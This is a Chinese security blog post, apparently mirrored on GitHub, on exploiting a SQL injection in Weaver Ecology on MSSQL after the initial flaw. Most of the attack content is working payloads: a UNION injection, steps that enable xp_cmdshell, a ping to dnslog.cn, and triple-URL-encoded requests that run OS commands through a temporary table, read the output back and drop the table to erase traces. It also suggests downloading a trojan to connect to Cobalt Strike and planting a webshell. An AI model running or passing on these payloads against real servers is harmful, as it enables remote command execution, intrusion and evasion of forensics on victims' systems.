泛微Ecology Mssql注入后利用

小黑说安全

小黑说安全

微信号 Xxia0hei04

功能介绍攻防、审计、物联网、车联网研究

__发表于

收录于合集

以下文章来源于XINYU2428 ，作者XINYU2428

XINYU2428 .

信息安全打工人的学习分享及日常记录

0x00 前言

三月份，网上公开了个某微SQL注入漏洞，网上师傅们已经详细分析过该漏洞。

本篇文章主要记录漏洞复现过程中，关于一些已验证的漏洞后利用方式。

0x01 漏洞验证

利用网上的POC验证是否存在漏洞，顺带判断下数据库版本。

注入语句需要进行三次URL编码，以绕过关键字过滤。

a' union select 1,''+(SELECT @@VERSION)+'

漏洞原作者在博客中提到了这样一个细节，根据这个细节做了一些测试。

0x02 出网利用

执行ping命令测试

还是熟悉的那些语句，只是测试时有一些小坑，都踩过了。

POC如下（未编码前）：

keyword='EXEC sp_configure 'show advanced options',1 select'keyword='RECONFIGURE select'keyword='EXEC sp_configure 'xp_cmdshell',1 select'keyword='RECONFIGURE select'keyword='exec master..xp_cmdshell 'ping dnslog.cn' select'

出网的话，直接远程下载马，然后执行上到CS，点就有喽。

0x03 不出网利用（结果回显）

1、创建一个临时表 temp_abc , 未编码前的注入语句如下:

keyword=x'CREATE TABLE ecology.dbo.temp_abcd(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100)) select'

不涉及特殊字符的部分可以不进行URL编码

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%30%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%36%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%39%25%32%35%25%33%35%25%33%34%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%38%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%32%25%32%35%25%33%33%25%33%31%25%32%35%25%33%33%25%33%30%25%32%35%25%33%33%25%33%30%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37

2、执行命令，并将执行结果内容写入临时表中

keyword=x'INSERT INTO ecology.dbo.temp_abcd(data) EXEC master..xp_cmdshell 'chdir' select'

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%36%36%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%38%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%36%35%25%32%35%25%33%32%25%36%35%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%30%25%32%35%25%33%35%25%36%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%32%25%33%37whoami%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37

3、从临时表中查询出命令执行的结果

当你多次执行命令时，新的命令执行结果会新增到临时表中，此时需要改变id以获取最新的结果（id=2、id=3...）

keyword=x'UNION SELECT 1,(select data from ecology.dbo.temp_abcd where id=1)+'

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%35%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30id=1%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

4、清理痕迹，删除临时表

keyword=x'DROP TABLE ecology.dbo.temp_abcd select'

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%35%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37

构造的实际执行的SQL语句与原SQL语句对比

 select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%keyword%'

select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%keyword'union select 1,(select data from ecology.dbo.temp_abcd where id=1)+'%'

0x04 总结

在实际项目中，注意先搞清楚杀软情况，再决定下一步操作。
不出网时，如果需要写一个webshell，注意先判断是否站库分离。
当执行命令的结果为多行内容时，需要去遍历 id 以获取完整的命令执行结果。
结果内容较多，可以使用Burp的Intruder模块辅助遍历。
在测试过程中发现，删除临时表后仍能访问到缓存数据（无影响，但请留意别入坑）。

0x05 参考文章

http://www.lvyyevd.cn/archives/mou-wei-sql-zhu-ru-fen-xi

https://mp.weixin.qq.com/s/17tc4ep83x4243lzr-brCg

说明: 文章不保证内容完全准确, 文中如有错误还请多多指出, 共同进步.

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序

取消允许

：，。视频小程序赞，轻点两下取消赞在看，轻点两下取消在看

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[小黑说安全]-2023-8-3-泛微Ecology Mssql注入后利用.md

[小黑说安全]-2023-8-3-泛微Ecology Mssql注入后利用.md

泛微Ecology Mssql注入后利用

0x00 前言

0x01 漏洞验证

0x02 出网利用

0x03 不出网利用（结果回显）

0x04 总结

0x05 参考文章

Files

[小黑说安全]-2023-8-3-泛微Ecology Mssql注入后利用.md

Latest commit

History

[小黑说安全]-2023-8-3-泛微Ecology Mssql注入后利用.md

File metadata and controls

泛微Ecology Mssql注入后利用

0x00 前言

0x01 漏洞验证

0x02 出网利用

0x03 不出网利用（结果回显）

0x04 总结

0x05 参考文章